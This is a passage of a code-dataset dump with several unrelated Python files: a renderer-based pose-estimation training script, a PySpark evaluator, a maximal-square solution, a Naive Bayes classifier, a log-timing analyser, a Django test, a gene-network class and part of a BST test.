image loading from file or a different structure\n # must return image and center\n sel_images = self.images[index].astype(np.float32) / 255\n sel_sils = self.silhouettes[index]\n sel_params = self.parameters[index]\n\n if self.transform is not None:\n sel_images = self.transform(sel_images)\n sel_sils = torch.from_numpy(sel_sils)\n\n # squeeze transform sil from tensor shape [6,1,512,512] to shape [6, 512, 512]\n return sel_images, np.squeeze(sel_sils), torch.FloatTensor(sel_params) # return all parameter in tensor form\n\n def __len__(self):\n return len(self.images) # return the length of the dataset\n\ndef Myresnet50(filename_obj=None, pretrained=True, cifar = True, modelName='None', **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ModelResNet50( filename_obj=filename_obj)\n if pretrained:\n print('using own pre-trained model')\n\n if cifar == True:\n pretrained_state = model_zoo.load_url(model_urls['resnet50'])\n model_state = model.state_dict()\n pretrained_state = {k: v for k, v in pretrained_state.items() if\n k in model_state and v.size() == model_state[k].size()}\n model_state.update(pretrained_state)\n model.load_state_dict(model_state)\n model.eval()\n\n else:\n model.load_state_dict(torch.load('models/{}.pth'.format(modelName)))\n model.eval()\n print('download finished')\n return model\n\n\nclass ModelResNet50(ResNet):\n def __init__(self, filename_obj=None, filename_init=None, *args, **kwargs):\n super(ModelResNet50, self).__init__(Bottleneck, [3, 4, 6, 3], num_classes=3, **kwargs)\n\n# resnet part\n self.seq1 = nn.Sequential(\n self.conv1,\n self.bn1,\n self.relu,\n self.maxpool,\n\n self.layer1,\n self.layer2\n )\n\n self.seq2 = nn.Sequential(\n self.layer3,\n self.layer4,\n self.avgpool,\n )\n\n self.fc\n\n# render part\n\n vertices, faces, textures = nr.load_obj(filename_obj, load_texture=True)\n vertices = vertices[None, :, :] # [num_vertices, XYZ] -> [batch_size=1, num_vertices, XYZ]\n faces = faces[None, :, :] # [num_faces, 3] -> [batch_size=1, num_faces, 3\n textures = textures[None, :, :]\n\n self.register_buffer('vertices', vertices)\n self.register_buffer('faces', faces)\n self.register_buffer('textures', textures)\n\n # ---------------------------------------------------------------------------------\n # extrinsic parameter, link world/object coordinate to camera coordinate\n # ---------------------------------------------------------------------------------\n\n alpha = np.radians(0)\n beta = np.radians(0)\n gamma = np.radians(0)\n\n x = 0 # uniform(-2, 2)\n y = 0 # uniform(-2, 2)\n z = 6 # uniform(5, 10) #1000t was done with value between 7 and 10, Rot and trans between 5 10\n\n resolutionX = 512 # in pixel\n resolutionY = 512\n scale = 1\n f = 35 # focal on lens\n sensor_width = 32 # in mm given in blender , camera sensor type\n pixels_in_u_per_mm = (resolutionX * scale) / sensor_width\n pixels_in_v_per_mm = (resolutionY * scale) / sensor_width\n pix_sizeX = 1 / pixels_in_u_per_mm\n pix_sizeY = 1 / pixels_in_v_per_mm\n\n Cam_centerX = resolutionX / 2\n Cam_centerY = resolutionY / 2\n\n batch = vertices.shape[0]\n\n Rx = np.array([[1, 0, 0],\n [0, m.cos(alpha), -m.sin(alpha)],\n [0, m.sin(alpha), m.cos(alpha)]])\n\n Ry = np.array([[m.cos(beta), 0, m.sin(beta)],\n [0, 1, 0],\n [-m.sin(beta), 0, m.cos(beta)]])\n\n Rz = np.array([[m.cos(gamma), -m.sin(gamma), 0],\n [m.sin(gamma), m.cos(gamma), 0],\n [0, 0, 1]])\n\n # creaete the rotation camera matrix\n\n Rzy = 
np.matmul(Rz, Ry)\n Rzyx = np.matmul(Rzy, Rx)\n R = Rzyx\n\n t = np.array([x, y, z]) # camera position [x,y, z] 0 0 5\n\n # ---------------------------------------------------------------------------------\n # intrinsic parameter, link camera coordinate to image plane\n # ---------------------------------------------------------------------------------\n\n K = np.array([[f / pix_sizeX, 0, Cam_centerX],\n [0, f / pix_sizeY, Cam_centerY],\n [0, 0, 1]]) # shape of [nb_vertice, 3, 3]\n\n K = np.repeat(K[np.newaxis, :, :], batch, axis=0) # shape of [batch=1, 3, 3]\n R = np.repeat(R[np.newaxis, :, :], batch, axis=0) # shape of [batch=1, 3, 3]\n t = np.repeat(t[np.newaxis, :], 1, axis=0) # shape of [1, 3]\n\n self.K = K\n # self.R = nn.Parameter(torch.from_numpy(np.array(R, dtype=np.float32)))\n self.R = R\n # self.Rx\n # self.Ry\n # self.Rz\n # quaternion notation?\n # -------------------------- working block translation\n self.tx = torch.from_numpy(np.array(x, dtype=np.float32)).cuda()\n self.ty = torch.from_numpy(np.array(y, dtype=np.float32)).cuda()\n self.tz = torch.from_numpy(np.array(z, dtype=np.float32)).cuda()\n self.t =torch.from_numpy(np.array([self.tx, self.ty, self.tz], dtype=np.float32)).unsqueeze(0)\n # self.t = nn.Parameter(torch.from_numpy(np.array([self.tx, self.ty, self.tz], dtype=np.float32)).unsqueeze(0))\n\n # --------------------------\n\n # setup renderer\n renderer = nr.Renderer(camera_mode='projection', orig_size=512, K=K, R=self.R, t=self.t, image_size=512, near=1,\n far=1000,\n light_intensity_ambient=1, light_intensity_directional=0, background_color=[0, 0, 0],\n light_color_ambient=[1, 1, 1], light_color_directional=[1, 1, 1],\n light_direction=[0, 1, 0])\n\n self.renderer = renderer\n\n def forward(self, x):\n x = self.seq1(x)\n x = self.seq2(x)\n params = self.fc(x.view(x.size(0), -1))\n print('computed parameters are {}'.format(params))\n return params\n\n# ---------------------------------------------------------------------------------\n# make Gif\n# ---------------------------------------------------------------------------------\ndef make_gif(filename):\n with imageio.get_writer(filename, mode='I') as writer:\n for filename in sorted(glob.glob('/tmp/_tmp_*.png')):\n writer.append_data(imread(filename))\n os.remove(filename)\n writer.close()\n\ndef R2Rmat(R, n_comps=1):\n #function use to make the angle into matrix for the projection function of the renderer\n\n # R[0] = 1.0472\n # R[1] = 0\n # R[2] = 0.698132\n alpha = R[0,0] #already in radian\n beta = R[0,1]\n gamma = R[0,2]\n\n rot_x = Variable(torch.zeros(n_comps, 3, 3).cuda(), requires_grad=False)\n rot_y = Variable(torch.zeros(n_comps, 3, 3).cuda(), requires_grad=False)\n rot_z = Variable(torch.zeros(n_comps, 3, 3).cuda(), requires_grad=False)\n rot_x[:, 0, 0] = 1\n rot_x[:, 0, 1] = 0\n rot_x[:, 0, 2] = 0\n rot_x[:, 1, 0] = 0\n rot_x[:, 1, 1] = alpha.cos()\n rot_x[:, 1, 2] = -alpha.sin()\n rot_x[:, 2, 0] = 0\n rot_x[:, 2, 1] = alpha.sin()\n rot_x[:, 2, 2] = alpha.cos()\n\n rot_y[:, 0, 0] = beta .cos()\n rot_y[:, 0, 1] = 0\n rot_y[:, 0, 2] = beta .sin()\n rot_y[:, 1, 0] = 0\n rot_y[:, 1, 1] = 1\n rot_y[:, 1, 2] = 0\n rot_y[:, 2, 0] = -beta .sin()\n rot_y[:, 2, 1] = 0\n rot_y[:, 2, 2] = beta.cos()\n\n rot_z[:, 0, 0] = gamma.cos()\n rot_z[:, 0, 1] = -gamma.sin()\n rot_z[:, 0, 2] = 0\n rot_z[:, 1, 0] = gamma.sin()\n rot_z[:, 1, 1] = gamma.cos()\n rot_z[:, 1, 2] = 0\n rot_z[:, 2, 0] = 0\n rot_z[:, 2, 1] = 0\n rot_z[:, 2, 2] = 1\n\n\n R = torch.bmm(rot_z, torch.bmm(rot_y, rot_x))\n # print(R)\n # cp_rotMat = 
(R) # cp_rotMat = (model.R).detach().cpu().numpy()\n # r = Rot.from_dcm(cp_rotMat.detach().cpu().numpy())\n # r_euler = r.as_euler('xyz', degrees=True)\n # print('reuler: {}'.format(r_euler))\n return R\n\n# ---------------------------------------------------------------------------------\n# Main\n# ---------------------------------------------------------------------------------\ndef main():\n\n # ---------- LOAD DATASET AND FILE SELECTION ----------------------------------------------------------------------\n start = time.time()\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n torch.cuda.empty_cache()\n print(device)\n\n file_name_extension = 'Rotation_centered_im4'\n\n\n cubes_file = 'Npydatabase/wrist_{}.npy'.format(file_name_extension)\n silhouettes_file = 'Npydatabase/sils_{}.npy'.format(file_name_extension)\n parameters_file = 'Npydatabase/params_{}.npy'.format(file_name_extension)\n\n wrist = np.load(cubes_file)\n sils = np.load(silhouettes_file)\n params = np.load(parameters_file)\n\n train_im = wrist # 90% training\n train_sil = sils\n train_param = params\n\n normalize = Normalize(mean=[0.5], std=[0.5])\n transforms = Compose([ToTensor(), normalize])\n train_dataset = CubeDataset(train_im, train_sil, train_param, transforms)\n\n\n train_dataloader = DataLoader(train_dataset, batch_size=1, shuffle=True, num_workers=1)\n\n # # check to iterate inside the test dataloader\n # for image, sil, param in train_dataloader:\n #\n # # print(image[2])\n # print(image.size(), param.size()) #torch.Size([batch, 3, 512, 512]) torch.Size([batch, 6])\n # im =0\n # print(param[im]) # parameter in form tensor([2.5508, 0.0000, 0.0000, 0.0000, 0.0000, 5.0000])\n #\n # image2show = image[im] # indexing random one image\n # print(image2show.size()) #torch.Size([3, 512, 512])\n # plt.imshow((image2show * 0.5 + 0.5).numpy().transpose(1, 2, 0))\n # plt.show()\n # break # break here just to show 1 batch of data\n\n count = 0\n losses = []\n a = []\n b = []\n c = []\n tx = []\n ty = []\n tz = []\n isRegression = []\n #ground value to be plotted on the graph as line\n alpha_GT = np.array( m.degrees(params[0,0]))\n beta_GT = np.array(m.degrees(params[0,1]))\n gamma_GT = np.array(m.degrees(params[0,2]))#angle in degrer\n tx_GT = np.array(params[0,3])\n ty_GT = np.array(params[0,4])\n tz_GT = np.array(params[0,5])\n\n iterations = 200\n\n\n # ---------- MODEL CREATION ----------------------------------------------------------------------\n parser = argparse.ArgumentParser()\n parser.add_argument('-io', '--filename_obj', type=str, default=os.path.join(data_dir, 'wrist.obj'))\n parser.add_argument('-or', '--filename_output', type=str, default=os.path.join(result_dir, '{}_render_animation.gif'.format(file_name_extension)))\n parser.add_argument('-mr', '--make_reference_image', type=int, default=0)\n parser.add_argument('-g', '--gpu', type=int, default=0)\n args = parser.parse_args()\n\n # resnet50 = models.resnet50(pretrained=True)\n\n model = Myresnet50(filename_obj=args.filename_obj)\n # model = Model(args.filename_obj, args.filename_ref)\n\n model.to(device)\n\n model.train(True)\n bool_first = True\n Lr_start = 0.00001\n decreaseat = 40\n lr = Lr_start\n loop = tqdm.tqdm(range(iterations))\n for i in loop:\n\n for image, silhouette, parameter in train_dataloader:\n image = image.to(device)\n imgGT = image\n parameter = parameter.to(device)\n init_params = parameter\n\n silhouette = silhouette.to(device)\n\n params = model(image)\n print('computed parameters are {}'.format(params))\n R 
= params\n model.R = R2Rmat(R).to(device) #angle from resnet are in radian\n model.t = (model.t).to(device)\n image = model.renderer(model.vertices, model.faces, R=model.R, t=model.t, mode='silhouettes')\n current_GT_sil = (silhouette / 255).type(torch.FloatTensor).to(device)\n # regression between computed and ground truth\n\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n loss = nn.BCELoss()(image, current_GT_sil)\n if (i % decreaseat == 0 and i > 2):\n if (lr > 0.00001):\n lr = lr / 10\n print('update lr, is now {}'.format(lr))\n\n print('loss is {}'.format(loss))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n losses.append(loss.detach().cpu().numpy())\n # print(((model.K).detach().cpu().numpy()))\n cp_x = ((model.t).detach().cpu().numpy())[0,0]\n cp_y = ((model.t).detach().cpu().numpy())[0,1]\n cp_z = ((model.t).detach().cpu().numpy())[0,2]\n\n\n cp_rotMat = (model.R) #cp_rotMat = (model.R).detach().cpu().numpy()\n r = Rot.from_dcm(cp_rotMat.detach().cpu().numpy())\n r_euler = r.as_euler('xyz', degrees=True)\n\n\n a.append(r_euler[0, 0]) # a.append(abs(r_euler[0,0] ))\n b.append(r_euler[0, 1])\n c.append(r_euler[0, 2])\n cp_a = r_euler[0, 0]\n cp_b = r_euler[0, 1]\n cp_c = r_euler[0, 2]\n\n\n tx.append(cp_x)\n ty.append(cp_y)\n tz.append(cp_z) #z axis value\n\n images, _, _ = model.renderer(model.vertices, model.faces, torch.tanh(model.textures), R = model.R, t= model.t )\n\n img = images.detach().cpu().numpy()[0].transpose(1,2,0)\n\n if(i == iterations-1):\n\n imgGT = imgGT.squeeze() # float32 from 0-1\n imgGT = imgGT.detach().cpu()\n imgGT = (imgGT * 0.5 + 0.5).numpy().transpose(1, 2, 0)\n # imgGT = (imgGT * 255).astype(np.uint8) # cast from float32 255.0 to 255 uint8\n\n f = plt.subplot(1, 2, 1)\n plt.imshow(imgGT)\n f.set_title('Ground truth \\n alpha {:.3f}° tx {}\\n'\n 'beta {:.3f}° ty {}\\n '\n 'gamma {:.3f}° tz {}'.format(alpha_GT,tx_GT, beta_GT,ty_GT,gamma_GT, tz_GT))\n plt.xticks([0, 512])\n plt.yticks([])\n f = plt.subplot(1, 2,2)\n plt.imshow(img)\n f.set_title('Renderer \\n alpha {:.3f}° tx {:.3f}\\n'\n 'beta {:.3f}° ty {:.3f}\\n'\n 'gamma {:.3f}° tz {:.3f}'.format(cp_a, cp_x,cp_b, cp_y,cp_c, cp_z))\n plt.xticks([0, 512])\n plt.yticks([])\n\n plt.savefig('results/2_rotation_render/Final_render_rotation_{}iterations_{}.png'.format(iterations, file_name_extension), bbox_inches = 'tight', pad_inches = 0.05)\n\n\n imsave('/tmp/_tmp_%04d.png' % i, img)\n loop.set_description('Optimizing (loss %.4f)' % loss.data)\n count = count +1\n\n\n end = time.time()\n exectime = round((end - start), 2) #format in minute\n print('time elapsed is: {} sec'.format(exectime))\n\n # ----------PLOT SECTION ------------------------------------------------------------------------\n make_gif(args.filename_output)\n fig, (p1, p3) = plt.subplots(2, figsize=(15,10)) #largeur hauteur\n fig.suptitle(\"Render for 1 image, {} epochs in {} sec, rotation only, 3 parameters \\n lr={} and decrease each {} iterations\".format(iterations,exectime, Lr_start, decreaseat), fontsize=14)\n\n p1.plot(np.arange(count), losses, label=\"Global Loss\")\n p1.set( ylabel='BCE Loss')\n p1.set_yscale('log')\n p1.set_ylim([0, 1])\n p1.set(xlabel='Iterations')\n # Place a legend to the right of this smaller subplot.\n p1.legend()\n\n p3.plot(np.arange(count), a, label=\"alpha values\", color = 'g')\n p3.axhline(y=alpha_GT, color = 'g', linestyle= '--' )\n p3.plot(np.arange(count), b, label=\"beta values\", color = 'y')\n p3.axhline(y=beta_GT, color = 'y', linestyle= '--')\n 
p3.plot(np.arange(count), c, label=\"gamma values\", color = 'b')\n p3.axhline(y=gamma_GT, color = 'b', linestyle= '--' )\n\n p3.set(xlabel='iterations', ylabel='Rotation value')\n p3.set_ylim([-180, 180])\n p3.legend()\n\n fig.savefig('results/2_rotation_render/render_1image_Translation_3params_{}.pdf'.format(file_name_extension), bbox_inches = 'tight', pad_inches = 0.05)\n fig.savefig('results/2_rotation_render/render_1image_Translation_3params_{}.png'.format(file_name_extension), bbox_inches = 'tight', pad_inches = 0.05)\n matplotlib2tikz.save(\"results/2_rotation_render/render_1image_Translation_3params_{}.tex\".format(file_name_extension),figureheight='5.5cm', figurewidth='15cm')\n plt.show()\n\nif __name__ == '__main__':\n main()","sub_path":"training1image/2_example5_resnet_1im_rotation_Render_3params.py","file_name":"2_example5_resnet_1im_rotation_Render_3params.py","file_ext":"py","file_size_in_byte":19136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"393140861","text":"from pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\n\n\ndef evaluate_binary_classifier(predictions):\n PR_evaluator = \\\n BinaryClassificationEvaluator(labelCol=\"label\",\n rawPredictionCol=\"rawPrediction\",\n metricName=\"areaUnderPR\")\n area_under_PR = PR_evaluator.evaluate(predictions)\n f1_evaluator = \\\n MulticlassClassificationEvaluator(predictionCol='prediction',\n labelCol='label',\n metricName='f1')\n f1_score = f1_evaluator.evaluate(predictions)\n ROC_evaluator = \\\n BinaryClassificationEvaluator(labelCol=\"label\",\n rawPredictionCol=\"rawPrediction\",\n metricName=\"areaUnderROC\")\n area_under_ROC = ROC_evaluator.evaluate(predictions)\n acc_evaluator = \\\n MulticlassClassificationEvaluator(predictionCol='prediction',\n labelCol='label',\n metricName='accuracy')\n acc_score = acc_evaluator.evaluate(predictions)\n\n print(f\"Area Under PR = {area_under_PR}\")\n print(f\"F1 score = {f1_score}\")\n print(f\"Area Under ROC = {area_under_ROC}\")\n print(f\"Accuracy = {acc_score}\")\n\n return (area_under_PR, f1_score, area_under_ROC, acc_score)\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"470543666","text":"#!/usr/bin/python\n\"\"\"\nGiven a 2d binary matrix filled with 0's and 1's, find the largest square containing only 1's and return its area.\nleetcode #221. 
This particular solution takes in array of string, which is for the submission\non leetcode.\n\"\"\"\n\ndef maximal_square_dp_better_space(mtx):\n \"\"\"\n Solving the problem using dynamic programming with O(mn) speed and O(n) space.\n \"\"\"\n w = len(mtx[0])\n h = len(mtx)\n\n rslt = [0]*(w+1)\n\n maxsqlen = 0\n prev = 0\n for i in xrange(1, h+1):\n for j in xrange(1, w+1):\n tmp = rslt[j]\n if mtx[i-1][j-1] == '1':\n rslt[j] = min(rslt[j-1], rslt[j], prev) + 1\n maxsqlen = max(maxsqlen, rslt[j])\n else:\n rslt[j] = 0\n prev = tmp\n\n return maxsqlen*maxsqlen\n\ndef test1():\n mtx = ['10100', \\\n '10111', \\\n '11111', \\\n '10010']\n\n print(maximal_square_dp_better_space(mtx))\n\ndef test2():\n mtx = ['1111', \\\n '1111', \\\n '1100', \\\n '1101']\n\n print(maximal_square_dp_better_space(mtx))\n\ndef test3():\n mtx = ['1101', \\\n '0001', \\\n '0000', \\\n '0001']\n\n print(maximal_square_dp_better_space(mtx))\n\ndef test4():\n mtx = ['01110', \\\n '11110', \\\n '01111', \\\n '01111', \\\n '00111']\n\n print(maximal_square_dp_better_space(mtx))\n\nif __name__ == '__main__':\n test1()\n print('------')\n test4()\n# test2()\n# print('------')\n# test3()\n# print('------')\n# test4()\n","sub_path":"dynamicProgramming/maximalSquareStrInput.py","file_name":"maximalSquareStrInput.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"290490278","text":"#Implementation of Naive Bayes classifier.\n\n#Jenna Bellassai\n#28 October 2016\n\nimport sys\nimport csv\nimport random\nimport math\nimport collections\nimport copy\n\nPOSSIBLE_ATT_VALS = dict()\natts_list = []\nlabel_list = []\n\nclass Instance:\n def __init__(self,label,atts):\n self.label = label\n self.atts = atts\n\n'''construct list of instances from csv file'''\ndef get_instances(file):\n first_row = True\n all_instances = []\n with open(file, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n atts = collections.OrderedDict()\n if first_row==True:\n label_name = row[0]\n for i in range(1, len(row)):\n atts_list.append(row[i]) #set general attribute names\n POSSIBLE_ATT_VALS[row[i]] = []\n first_row = False\n else:\n label = row[0] #store label for this instance\n if label not in label_list:\n label_list.append(label)\n for i in range(1, len(row)):\n atts[atts_list[i-1]] = row[i]\n if (row[i]) not in POSSIBLE_ATT_VALS[atts_list[i-1]]:\n if (row[i]) != '?':\n POSSIBLE_ATT_VALS[atts_list[i-1]].append(row[i])\n instance = Instance(label, atts)\n all_instances.append(instance)\n return(all_instances,label_name)\n\n'''split instances into training and test sets using random seed'''\ndef split_instances(all_instances, seed):\n seed = random.seed(seed)\n random.shuffle(all_instances) #shuffled list of instances\n train_size = int(round(0.6 * len(all_instances)))\n test_size = len(all_instances) - train_size\n train_set = []\n test_set = []\n for i in range(0, train_size):\n train_set.append(all_instances[i])\n for i in range(train_size, len(all_instances)):\n test_set.append(all_instances[i])\n return (train_set, test_set)\n\n'''train model on training set'''\ndef naive_bayes_train(train_set):\n train_label_dict = dict()\n '''build dictionary of every possible label in the training set'''\n for instance in train_set: \n if instance.label not in train_label_dict:\n train_label_dict[instance.label] = 1\n else:\n train_label_dict[instance.label] += 1 \n \n '''create 2D dictionary structure for storing counts''' \n label_tables = 
collections.OrderedDict()\n for label in train_label_dict.keys():\n label_tables[label] = collections.OrderedDict()\n for attribute in atts_list:\n label_tables[label][attribute] = collections.OrderedDict()\n \n '''fill dictionary structure with counts'''\n for label in train_label_dict.keys(): #for every observed label\n for instance in train_set: #for each instance\n if instance.label==label:\n for att_val in instance.atts.items(): #for each attribute value\n attribute = att_val[0]\n value = att_val[1]\n if value not in label_tables[label][attribute].keys(): #if this att value is not in the attribute dict yet\n label_tables[label][attribute][value] = 1\n else:\n label_tables[label][attribute][value] += 1\n '''calculate probabilities using structure of counts''' \n prob_tables = copy.deepcopy(label_tables)\n a = 1\n for label in label_tables.keys():\n for attribute in label_tables[label].keys():\n for value in label_tables[label][attribute].keys():\n numerator = a + label_tables[label][attribute][value]\n b = len(POSSIBLE_ATT_VALS[attribute])\n denominator = b + train_label_dict[label]\n prob_tables[label][attribute][value] = numerator / denominator\n return prob_tables, train_label_dict\n\n'''use trained model to make predictions on test set''' \ndef naive_bayes_predict(instance, train_set, prob_tables, train_label_dict):\n label_scores = dict()\n for label in train_label_dict.keys(): #make calcuations for every possible label\n p_l = train_label_dict[label] / len(train_set) #prior probability\n '''apply Bayes's rule'''\n p_instance = 1\n for att_val in instance.atts.items(): #for each of the instance's attribute values\n attribute = att_val[0]\n value = att_val[1]\n if value not in prob_tables[label][attribute].keys(): #if this attribute value didn't appear in the training set\n curr_p = 1 / len(POSSIBLE_ATT_VALS[attribute]) #pseudo counts case\n else:\n curr_p = prob_tables[label][attribute][value] #retrieve prob of current label given current attribute and its value\n p_instance = p_instance * curr_p\n sum = math.log(p_l) + math.log(p_instance) #log transformation to avoid underfitting\n label_score = math.exp(sum)\n label_scores[label] = label_score\n curr_max = 0\n curr_label = None\n for item in label_scores.items(): #for every label score\n if item[1] > curr_max: #if label's score is greatest so far\n curr_max = item[1] #store this label as highest performing label\n curr_label = item[0]\n return curr_label\n \n \n\nif __name__ == '__main__':\n all_instances, label_name = get_instances(sys.argv[1])\n seed = sys.argv[2]\n train_set, test_set = split_instances(all_instances, seed)\n probs, train_label_dict = naive_bayes_train(train_set)\n \n '''build confusion matrix''' \n predict_list=[]\n actual_list = []\n for instance in all_instances:\n if instance.label not in predict_list:\n predict_list.append(instance.label)\n if instance.label not in actual_list:\n actual_list.append(instance.label)\n matrix = [[0]*len(predict_list) for i in range(len(predict_list))]\n correct = 0\n total = 0\n for instance in test_set:\n prediction = naive_bayes_predict(instance,train_set,probs,train_label_dict)\n if prediction==instance.label:\n correct += 1\n total += 1\n else:\n total += 1\n for i in range(len(predict_list)):\n if predict_list[i]==prediction:\n for j in range(len(actual_list)):\n if actual_list[j]==instance.label:\n matrix[i][j] += 1\n \n \n '''output confusion matrix to csv'''\n file_name = \"results_\"+sys.argv[1]+\"_NaiveBayes_\"+sys.argv[2]+\".csv\"\n file = open(file_name,'w')\n 
for label in predict_list:\n        file.write(label)\n        file.write(\",\")\n    file.write('\\n')\n    for i in range(len(matrix)):\n        for item in matrix[i]:\n            file.write(str(item))\n            file.write(\",\")\n        file.write(predict_list[i])\n        file.write('\\n')\n    \n    ","sub_path":"NBPart1.py","file_name":"NBPart1.py","file_ext":"py","file_size_in_byte":6936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"119962132","text":"import os\n\ndef anaysis_data():\n    test_times = []\n    # open the data.log file\n    with open(os.getcwd() + \"/data.log\") as fs:\n        for line in fs.readlines(): # read line by line\n            temp = line.strip(\"\\n\").split(\",\") # strip the newline, then split on commas\n            print(\"temp\",temp)\n            if temp[-1] == str(0): # keep TestTime entries whose success field is 0\n                test_times.append(int(temp[-2]))\n\n    if len(test_times) > 0:\n        avg_time = sum(test_times) / len(test_times) # average\n        max_time = max(test_times)\n        min_time = min(test_times)\n        print(\"Max TestTime: \",max_time,\", min TestTime: \",min_time,\", average TestTime: \",avg_time)\n\n\nif __name__ == '__main__':\n    anaysis_data()","sub_path":"python 25 code/exam2_0302_python_api/exam2-last p.py","file_name":"exam2-last p.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"363218143","text":"from django.test import LiveServerTestCase\n# from selenium import webdriver\n# from xvfbwrapper import Xvfb\nimport requests\n\n\nclass NewVisitorTest(LiveServerTestCase):\n    # def setUp(self):\n    #     self.xvfb = Xvfb(width=1280, height=720)\n    #     self.xvfb.start()\n    #     self.browser = webdriver.Chrome()\n\n\n    def test_greet_anonymous_entities(self):\n        r = requests.get(self.live_server_url)\n        self.assertEqual(r.status_code, 200)\n        self.assertEqual(r.text, '{\"message\":\"Welcome to the Kyonan Inventory System\"}')\n\n    # def tearDown(self):\n    #     self.browser.quit()\n    #     self.xvfb.stop()\n\n","sub_path":"server/functional_tests/test_all_users.py","file_name":"test_all_users.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"321127364","text":"from GeneNode import GeneNode\n\nclass Network:\n    network = {}\n    \n    ## build network data structure using edge list csv file\n    def __init__(self,fileName=None,split=\"\"):\n        self.network = {}\n        \n        if fileName is not None:\n            edge_list = open(fileName,\"r\")\n            for l in edge_list:\n                #skip header line\n                if \"Source\" in l:\n                    continue\n\n                array = l.strip().split(split)\n                self.createNode(array)\n    \n    @staticmethod\n    def sequenceToEdgeList(list,fout,network,header=False):\n        if header:\n            fout.write(\"Edge\\tAttribute\\n\")\n        for i in xrange(0,len(list)-1):\n            fout.write(list[i]+\" (\"+network.getEdgeType(list[i])+\") \"+list[i+1]+\"\\t\"+\"loop\"+\"\\n\")\n    def getNodes(self):\n        return self.network.keys()\n\n    def printNodesToFile(self,fname,type):\n        fout = file(fname,\"w\")\n        for n in self.getNodes():\n            node = self.getNode(n)\n            if type==\"all\" or type==node.nodeType:\n                fout.write(node.geneID+\"\\n\")\n        fout.close()\n\n    def getNode(self,n):\n        return self.network[n]\n\n    ## helper method to add node to the network from edge list element\n    def createNode(self,element):\n        source = element[0]\n        target = element[1]\n\n        if source not in self.network:\n            self.network[source] = GeneNode(source)\n\n        if target not in self.network:\n            self.network[target] = GeneNode(target)\n\n        self.network[source].addOutWardNode(target)\n        self.network[target].addInWardNode(source)\n\n    def 
getEndNodesOfNetwork(self):\n endNodeSet = set()\n for node in self.network:\n if self.network[node].isEndNode():\n endNodeSet.add(node)\n return endNodeSet\n\n def getStartNodesOfNetwork(self):\n startNodeSet = set()\n for node in self.network:\n if self.network[node].isStartNode():\n startNodeSet.add(node)\n return startNodeSet\n\n ##recursive method that is called for longest chain calculation\n def calculateLongestChain(self,node,level,visited):\n\n if self.network[node].isEndNode() or node in visited:\n return level+1\n\n visited.add(node)\n maxVal = -999\n for n in self.network[node].getOutWardNode():\n result = self.calculateLongestChain(n,level+1,visited)\n if result>maxVal:\n maxVal = result\n\n return maxVal\n\n ## calculate longest chain from every starting nodes in the network\n def longestNodesChain(self):\n startNodes = self.getStartNodesOfNetwork()\n output = {}\n for n in startNodes:\n visited = set()\n level = self.calculateLongestChain(n,0,visited)\n output[n] = level\n\n return output\n\n ##print network into edge list file, you can skip node if you want to exclude some node\n def printNetworkTofile(self,skipNode,fName):\n fName.write(\"Source\\tTarget\\tType\\n\")\n toPrint = set()\n for n in self.network:\n self.network[n].printEdgeRel(toPrint)\n\n for n in toPrint:\n split = n.split(\"\\t\")\n if split[0] in skipNode or split[1] in skipNode:\n continue\n fName.write(n)\n\n @staticmethod ## load node value from inputted file\n def loadNodeValue(fname):\n nodeValue = {}\n for line in fname:\n if \"Gene\" in line:\n continue\n\n array = line.split(\"\\t\")\n\n nodeValue[array[0]] = array[1]\n\n return nodeValue\n\n ## set node value and store it in the score attribute\n def setNodeValue(self,valueList):\n for n in self.network:\n if n in valueList:\n self.network[n].score = float(valueList[n])\n else:\n self.network[n].score = float(0)\n\n def removeNode(self,node): ##remove node from the network\n for n in self.network[node].getInWardNode():\n self.network[n].removeOutWardNode(node)\n\n for n in self.network[node].getOutWardNode():\n self.network[n].removeInWardNode(node)\n\n self.network.pop(node)\n\n ##remove edge that connect exactly same source and target\n def removeSamePath(self):\n for n in self.network:\n if self.network[n].nodeType==\"protein\":\n continue\n\n connectedNodes = set()\n outWardEdge = self.network[n].getOutWardNode()\n\n for edge in outWardEdge:\n\n if len(self.network[edge].getInWardNode())>1:\n continue\n\n edge_outward = set(self.network[edge].getOutWardNode())\n intersect = connectedNodes.intersection(edge_outward)\n for i in intersect:\n self.network[edge].removeOutWardNode(i)\n self.network[i].removeInWardNode(edge)\n connectedNodes = connectedNodes.union(edge_outward)\n\n ##remove protein nodes that are in the starting node or end node\n def filterProteinNode(self):\n start = self.getStartNodesOfNetwork()\n for n in start:\n if self.network[n].nodeType==\"protein\":\n self.removeNode(n)\n\n end = self.getEndNodesOfNetwork()\n for n in end:\n if self.network[n].nodeType==\"protein\":\n self.removeNode(n)\n\n ##remove short sub network that is isolated, remove protein node is start/end pos, remove same path\n def filterNetwork(self):\n output = self.longestNodesChain()\n while 1 in output.values() or 2 in output.values() or 3 in output.values():\n for n in output:\n if output[n]<=3:\n self.removeNode(n)\n self.filterProteinNode()\n output = self.longestNodesChain()\n\n self.removeSamePath()\n\n def calculateDepth(self,node,score,visited):\n 
if self.network[node].score child.value\n    for child in self.traverse_inorder(node.right):\n        assert node.value < child.value\n\n\n","sub_path":"Trees/py/test_bst.py","file_name":"test_bst.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
